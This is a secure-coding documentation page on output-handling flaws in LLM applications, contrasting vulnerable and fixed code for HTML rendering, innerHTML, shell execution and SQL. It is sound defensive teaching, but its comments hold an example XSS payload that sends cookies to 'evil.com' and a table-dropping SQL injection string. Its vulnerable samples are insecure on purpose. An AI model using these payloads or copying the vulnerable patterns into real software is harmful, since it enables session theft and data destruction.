Skip to Content
VulnerabilitiesOutput Handling

Output Handling

Output handling vulnerabilities occur when LLM responses are used in dangerous contexts without proper validation or encoding.

Output Validation Failures (HIGH)

CVSS 8.0 | CWE-79, CWE-89, CWE-94 | OWASP LLM02

LLM output used in dangerous sinks (eval, HTML, SQL, commands) without validation.

Vulnerable
LLM output rendered as HTML without encoding
from flask import Flask, render_template_string

@app.route("/chat")
def chat():
  response = llm.invoke(user_query)

  # DANGEROUS: LLM output directly in HTML
  return render_template_string(f"""
      <div class="response">{response}</div>
  """)

# LLM could output: <script>document.location='evil.com?c='+document.cookie</script>
Secure
HTML escaped before rendering
from flask import Flask, Markup
from markupsafe import escape

@app.route("/chat")
def chat():
  response = llm.invoke(user_query)

  # HTML escape the response
  safe_response = escape(response)

  return render_template_string(f"""
      <div class="response">{safe_response}</div>
  """)

Insufficient Output Encoding (MEDIUM)

XSS via unencoded LLM output in web applications.

Vulnerable
innerHTML with unescaped content
async function displayResponse(query) {
const response = await fetch('/api/chat', {
  method: 'POST',
  body: JSON.stringify({ query })
}).then(r => r.json());

// DANGEROUS: innerHTML can execute scripts
document.getElementById('output').innerHTML = response.message;
}
Secure
textContent prevents script execution
async function displayResponse(query) {
const response = await fetch('/api/chat', {
  method: 'POST',
  body: JSON.stringify({ query })
}).then(r => r.json());

// Safe: textContent treats everything as text
document.getElementById('output').textContent = response.message;

// Or use a sanitization library
// import DOMPurify from 'dompurify';
// element.innerHTML = DOMPurify.sanitize(response.message);
}

Output to Shell Commands

LLM output used in system commands without validation.

Vulnerable
LLM output passed to shell
import subprocess

def execute_llm_command(user_request):
  # LLM generates shell command
  command = llm.invoke(f"Generate bash command for: {user_request}")

  # CRITICAL: Direct shell execution
  result = subprocess.run(command, shell=True, capture_output=True)
  return result.stdout
Secure
Allowlist validation before execution
import subprocess
import shlex

ALLOWED_COMMANDS = {"ls", "pwd", "whoami", "date", "cat"}

def execute_llm_command(user_request):
  command = llm.invoke(f"Generate simple bash command for: {user_request}")

  # Parse the command
  parts = shlex.split(command)
  if not parts:
      raise ValueError("Empty command")

  # Allowlist check
  if parts[0] not in ALLOWED_COMMANDS:
      raise ValueError(f"Command not allowed: {parts[0]}")

  # Execute without shell
  result = subprocess.run(parts, shell=False, capture_output=True)
  return result.stdout

Output to Database Queries

LLM-generated data used in database operations.

Vulnerable
LLM output in f-string SQL
def store_summary(document):
  summary = llm.invoke(f"Summarize: {document}")

  # DANGEROUS: LLM output in SQL string
  cursor.execute(f"INSERT INTO summaries (text) VALUES ('{summary}')")

# LLM could output: '); DROP TABLE summaries; --
Secure
Parameterized queries with validation
def store_summary(document):
  summary = llm.invoke(f"Summarize: {document}")

  # Parameterized query prevents injection
  cursor.execute(
      "INSERT INTO summaries (text) VALUES (%s)",
      (summary,)
  )

Treat all LLM output as untrusted user input. Apply the same validation and encoding you would use for any external data.

Defense Strategies

1. Context-Aware Encoding

def safe_output(content, context): if context == "html": return html.escape(content) elif context == "sql": # Use parameterized queries instead raise ValueError("Use parameterized queries for SQL") elif context == "shell": return shlex.quote(content) elif context == "json": return json.dumps(content) else: return content

2. Content Security Policy

<!-- Prevent inline script execution --> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">

3. Output Validation Schema

from pydantic import BaseModel, validator class SafeResponse(BaseModel): message: str confidence: float @validator('message') def no_html(cls, v): if '<' in v or '>' in v: raise ValueError('HTML not allowed in response') return v

Checklist

  • HTML escape all LLM output before rendering
  • Use textContent instead of innerHTML in JavaScript
  • Use parameterized queries for any database operations
  • Never pass LLM output directly to shell commands
  • Implement Content Security Policy headers
  • Validate output against expected schema
Last updated on